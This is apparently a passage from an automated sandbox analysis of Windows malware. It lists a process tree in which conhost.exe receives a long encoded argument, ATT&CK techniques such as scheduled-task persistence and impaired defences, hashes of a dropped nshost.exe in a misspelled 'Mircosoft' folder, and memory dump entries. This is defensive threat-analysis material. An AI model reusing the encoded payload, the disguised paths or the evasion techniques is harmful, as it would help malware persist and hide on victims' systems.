- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1480

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "elciakxgyodfgp"
3⤵
PID:4032

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe ggorxoydbil1 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
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1304

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
62623d22bd9e037191765d5083ce16a3

SHA1
4a07da6872672f715a4780513d95ed8ddeefd259

SHA256
95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

SHA512
9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

Download Submit
C:\Users\Admin\AppData\Local\Temp\Mircosoft\nshost.exe
Filesize
7.2MB

MD5
cc45f791667f3b9fb6281414f5325561

SHA1
df8b29bbc15712f928a61f6d0c8e045d823dce84

SHA256
dde77f52e25c661b86b499b40e627512b5713e53744c2bafb57450d7fdac3785

SHA512
f70692b95b4b09d65f5bf4ef5915fccbf2f0628ad206e3fa064b6d595e5176d4e9d89368215b474e0ca95f38bae918fe31f2d64aa9849a9045cd5b4d84ff95d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Mircosoft\nshost.exe
Filesize
7.2MB

MD5
cc45f791667f3b9fb6281414f5325561

SHA1
df8b29bbc15712f928a61f6d0c8e045d823dce84

SHA256
dde77f52e25c661b86b499b40e627512b5713e53744c2bafb57450d7fdac3785

SHA512
f70692b95b4b09d65f5bf4ef5915fccbf2f0628ad206e3fa064b6d595e5176d4e9d89368215b474e0ca95f38bae918fe31f2d64aa9849a9045cd5b4d84ff95d7

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
3KB

MD5
3715acee4598ecc9f6edf98c069c8f85

SHA1
700c0bfc09fcde757b83d3b5a92fc5fd48c72d8b

SHA256
53058b8e6ef749657f41ebe3999b88439a3042af8dbc27623f8923a1e9937b19

SHA512
bb749cb320ab655961c2c9353f472e580d0f9fb3084b4066398177d725f199dfec4446eb222919ef3dd08c13e2f02d8426629794fe539e3706e28ff484e98359

Download Submit
memory/8-152-0x0000000000000000-mapping.dmp

Download
memory/400-141-0x0000000000000000-mapping.dmp

Download
memory/448-133-0x0000000000000000-mapping.dmp

Download
memory/448-134-0x00000209279F0000-0x0000020927A12000-memory.dmp

Filesize
136KB

Download
memory/448-135-0x00007FFC79F30000-0x00007FFC7A9F1000-memory.dmp

Filesize
10.8MB

Download
memory/560-187-0x0000000000000000-mapping.dmp

Download
memory/668-142-0x0000000000000000-mapping.dmp

Download
memory/896-155-0x0000000000000000-mapping.dmp

Download
memory/1124-236-0x0000000000000000-mapping.dmp

Download
memory/1180-180-0x0000000000000000-mapping.dmp

Download
memory/1200-186-0x0000000000000000-mapping.dmp

Download
memory/1224-150-0x0000000000000000-mapping.dmp

Download
memory/1224-247-0x0000000000000000-mapping.dmp

Download
memory/1288-137-0x0000000000000000-mapping.dmp

Download
memory/1304-231-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/1304-229-0x000000014036DB84-mapping.dmp

Download
memory/1304-195-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/1304-232-0x000001A086FE0000-0x000001A087000000-memory.dmp

Filesize
128KB

Download
memory/1304-253-0x000001A088930000-0x000001A088950000-memory.dmp

Filesize
128KB

Download
memory/1304-249-0x000001A0888F0000-0x000001A088930000-memory.dmp

Filesize
256KB

Download
memory/1304-254-0x000001A088930000-0x000001A088950000-memory.dmp

Filesize
128KB

Download
memory/1304-234-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/1304-230-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/1384-132-0x0000000000000000-mapping.dmp

Download
memory/1400-165-0x0000000000000000-mapping.dmp

Download
memory/1480-201-0x00007FFC97590000-0x00007FFC975A0000-memory.dmp

Filesize
64KB

Download
memory/1480-199-0x00007FFC97590000-0x00007FFC975A0000-memory.dmp

Filesize
64KB

Download
memory/1480-206-0x00007FFC97590000-0x00007FFC975A0000-memory.dmp

Filesize
64KB

Download
memory/1480-207-0x00007FFC97590000-0x00007FFC975A0000-memory.dmp

Filesize
64KB

Download
memory/1480-227-0x0000000000400000-0x0000000001246000-memory.dmp

Filesize
14.3MB

Download
memory/1480-235-0x00007FF429520000-0x00007FF4298F1000-memory.dmp

Filesize
3.8MB

Download
memory/1480-219-0x00007FFC97590000-0x00007FFC975A0000-memory.dmp

Filesize
64KB

Download
memory/1480-208-0x00007FFC97590000-0x00007FFC975A0000-memory.dmp

Filesize
64KB

Download
memory/1480-250-0x00007FFC976D0000-0x00007FFC976E0000-memory.dmp

Filesize
64KB

Download
memory/1480-209-0x00007FFC97590000-0x00007FFC975A0000-memory.dmp

Filesize
64KB

Download
memory/1480-210-0x00007FFC97590000-0x00007FFC975A0000-memory.dmp

Filesize
64KB

Download
memory/1480-205-0x00007FFC97590000-0x00007FFC975A0000-memory.dmp

Filesize
64KB

Download
memory/1480-204-0x00007FFC97590000-0x00007FFC975A0000-memory.dmp

Filesize
64KB

Download
memory/1480-212-0x00007FFC97590000-0x00007FFC975A0000-memory.dmp

Filesize
64KB

Download
memory/1480-213-0x00007FFC97590000-0x00007FFC975A0000-memory.dmp

Filesize
64KB

Download
memory/1480-214-0x00007FFC97590000-0x00007FFC975A0000-memory.dmp

Filesize
64KB

Download
memory/1480-203-0x00007FFC97590000-0x00007FFC975A0000-memory.dmp

Filesize
64KB

Download
memory/1480-202-0x00007FFC97590000-0x00007FFC975A0000-memory.dmp

Filesize
64KB

Download
memory/1480-226-0x0000000000400000-0x0000000001246000-memory.dmp

Filesize
14.3MB

Download
memory/1480-218-0x00007FFC97590000-0x00007FFC975A0000-memory.dmp

Filesize
64KB

Download
memory/1480-200-0x00007FFC97590000-0x00007FFC975A0000-memory.dmp

Filesize
64KB

Download
memory/1480-198-0x00007FFC97590000-0x00007FFC975A0000-memory.dmp

Filesize
64KB

Download
memory/1480-215-0x00007FFC97590000-0x00007FFC975A0000-memory.dmp

Filesize
64KB

Download
memory/1480-220-0x00007FFC97590000-0x00007FFC975A0000-memory.dmp

Filesize
64KB

Download
memory/1480-216-0x00007FFC97590000-0x00007FFC975A0000-memory.dmp

Filesize
64KB

Download
memory/1480-228-0x0000000000400000-0x0000000001246000-memory.dmp

Filesize
14.3MB

Download
memory/1480-221-0x00007FFC97590000-0x00007FFC975A0000-memory.dmp

Filesize
64KB

Download
memory/1480-222-0x00007FFC97690000-0x00007FFC976A0000-memory.dmp

Filesize
64KB

Download
memory/1480-197-0x00007FFC97590000-0x00007FFC975A0000-memory.dmp

Filesize
64KB

Download
memory/1480-189-0x0000000000400000-0x0000000001246000-memory.dmp

Filesize
14.3MB

Download
memory/1480-190-0x0000000001243F90-mapping.dmp

Download
memory/1480-217-0x00007FFC97590000-0x00007FFC975A0000-memory.dmp

Filesize
64KB

Download
memory/1480-196-0x00007FFC97590000-0x00007FFC975A0000-memory.dmp

Filesize
64KB

Download
memory/1480-192-0x0000000000400000-0x0000000001246000-memory.dmp

Filesize
14.3MB

Download
memory/1480-233-0x0000000000400000-0x0000000001246000-memory.dmp

Filesize
14.3MB

Download
memory/1480-211-0x00007FFC97590000-0x00007FFC975A0000-memory.dmp

Filesize
64KB

Download
memory/1480-224-0x00007FFC97690000-0x00007FFC976A0000-memory.dmp

Filesize
64KB

Download
memory/1480-223-0x00007FFC97690000-0x00007FFC976A0000-memory.dmp

Filesize
64KB

Download
memory/1480-225-0x0000000000400000-0x0000000001246000-memory.dmp

Filesize
14.3MB

Download
memory/1656-145-0x0000000000000000-mapping.dmp

Download
memory/1692-183-0x0000000000000000-mapping.dmp

Download
memory/1732-149-0x0000000000000000-mapping.dmp

Download
memory/1772-168-0x0000000000000000-mapping.dmp

Download
memory/1800-164-0x0000000000000000-mapping.dmp

Download
memory/1844-144-0x0000000000000000-mapping.dmp

Download
memory/1852-166-0x0000000000000000-mapping.dmp

Download
memory/1896-194-0x0000000000000000-mapping.dmp

Download
memory/1964-240-0x0000000000000000-mapping.dmp

Download
memory/1968-162-0x0000000000000000-mapping.dmp

Download
memory/2000-243-0x0000000000000000-mapping.dmp

Download
memory/2400-146-0x0000000000000000-mapping.dmp

Download
memory/2424-248-0x0000000000000000-mapping.dmp

Download
memory/2512-182-0x0000000000000000-mapping.dmp

Download
memory/2568-167-0x0000000000000000-mapping.dmp

Download
memory/2684-156-0x0000000000000000-mapping.dmp

Download
memory/3004-140-0x0000000000000000-mapping.dmp

Download
memory/3084-163-0x0000000000000000-mapping.dmp

Download
memory/3288-138-0x0000000000000000-mapping.dmp

Download
memory/3316-170-0x0000000000000000-mapping.dmp

Download
memory/3404-131-0x00007FFC79F30000-0x00007FFC7A9F1000-memory.dmp

Filesize
10.8MB

Download
memory/3404-130-0x0000000000A10000-0x0000000001144000-memory.dmp

Filesize
7.2MB

Download
memory/3496-178-0x00007FFC7A190000-0x00007FFC7AC51000-memory.dmp

Filesize
10.8MB

Download
memory/3496-175-0x0000000000000000-mapping.dmp

Download
memory/3956-139-0x0000000000000000-mapping.dmp

Download
memory/3984-246-0x0000000000000000-mapping.dmp

Download
memory/4024-161-0x0000000000000000-mapping.dmp

Download
memory/4032-251-0x0000024005840000-0x000002400584A000-memory.dmp

Filesize
40KB

Download
memory/4032-252-0x00007FFC7A190000-0x00007FFC7AC51000-memory.dmp

Filesize
10.8MB

Download
memory/4080-159-0x0000000000000000-mapping.dmp

Download
memory/4184-239-0x0000000000000000-mapping.dmp

Download
memory/4192-245-0x0000000000000000-mapping.dmp

Download
memory/4252-244-0x0000000000000000-mapping.dmp

Download
memory/4252-147-0x0000000000000000-mapping.dmp

Download
memory/4380-160-0x0000000000000000-mapping.dmp

Download
memory/4392-136-0x0000000000000000-mapping.dmp

Download
memory/4504-242-0x0000000000000000-mapping.dmp

Download
memory/4564-154-0x0000000000000000-mapping.dmp

Download
memory/4608-188-0x0000000000000000-mapping.dmp

Download
memory/4724-174-0x0000000000000000-mapping.dmp

Download
memory/4748-238-0x0000000000000000-mapping.dmp

Download
memory/4752-179-0x0000000000000000-mapping.dmp

Download
memory/4768-237-0x0000000000000000-mapping.dmp

Download
memory/4780-143-0x0000000000000000-mapping.dmp

Download
memory/4792-157-0x0000000000000000-mapping.dmp

Download
memory/4800-153-0x0000000000000000-mapping.dmp

Download
memory/4856-169-0x0000000000000000-mapping.dmp

Download
memory/4896-158-0x0000000000000000-mapping.dmp

Download
memory/4940-193-0x0000000003270000-0x0000000003282000-memory.dmp

Filesize
72KB

Download
memory/4940-173-0x00007FFC7A190000-0x00007FFC7AC51000-memory.dmp

Filesize
10.8MB

Download
memory/4988-151-0x0000000000000000-mapping.dmp

Download
memory/5008-241-0x0000000000000000-mapping.dmp

Download
memory/5056-184-0x0000000000000000-mapping.dmp

Download
memory/5060-148-0x0000000000000000-mapping.dmp

Download
memory/5104-185-0x0000000000000000-mapping.dmp

Download